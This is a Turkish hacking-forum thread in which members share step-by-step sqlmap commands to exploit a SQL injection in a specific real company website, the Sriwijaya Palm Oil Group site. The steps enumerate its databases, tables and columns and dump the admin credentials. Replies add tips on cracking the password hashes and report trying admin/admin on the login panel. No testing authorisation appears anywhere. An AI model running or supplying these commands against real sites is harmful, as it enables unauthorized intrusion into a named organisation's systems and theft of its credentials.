Sriwijaya Palm Oil Group
![spog.co.id](https://spog.co.id/index.php?action=newsmore&id=1/images/iconspog.png)
Komutları basit bir şekilde açıklıyayım.Bu açığı nasıl kullanırız? sqlmap ile mi?
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" --dbs
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) --tables
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) --columns
sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump
Sağol kral cansınKomutları basit bir şekilde açıklıyayım.
Terminale girip;
1. Kod:Yazarsanız siteyi tarar ve en altta size bulunan database lerş verir.Kod:sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" --dbs
2. Kod:Bu kod sütununda ise senin vermiş olduğun databasei taratır ve içindeki tabloları sıralar. Ben bu siteyi test için taratmıştım tabloların en üstünde admin tablosu yer alıyor zaten.Kod:sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) --tables
3. Kod:Bu kodu yazdıktan sonra ise admin tablosundaki colonları taratır. Bu siteyi tarattığın zaman çıkıcak sonu şunlar;Kod:sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) --columns
İD
UserName
Password
Son olarak bilgileri dump etmek kaldı.
4. Kod:Bu kodu yazdıktan sonra ise sana admin bilgilerini dump edicektir. Bazen MD5 SH1 gibi şifreler çıkıyor onlarıda chrome üzerinde hashes sitelerden çözebilirsin.Kod:sqlmap -u "https://spog.co.id/index.php?action=newsmore&id=1" -D (database adı) -T (tablo adı örneğin: admin) -C (Colon İsimleri Örneğin: id,username,password) --dump
SqlMap sadece bu kadar değil daha birkaç ayrıntı daha var ben sadece kısaca temel kodları anlattım bu kodlar ile admin bilgilerine erişebilirsin.
Not: Önüne bazen Y/N soruları çıkıcak onların hepsine Y diyip geçebilirsin.
Admin bilgileri panel ile uyuşmuyor çöp
Bende yeni farkettim hocam admin panele admin admin yazarsanizda password Salah yazıyor onu çözmeye calisiyorumAdmin bilgileri panel ile uyuşmuyor çöp
Sqlmap en iyisi olur Havin var alternatif ama büyük ihtimal çalışmaz manuel yapabilirsiniz oda çok zahmetliBu açığı nasıl kullanırız? sqlmap ile mi?
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.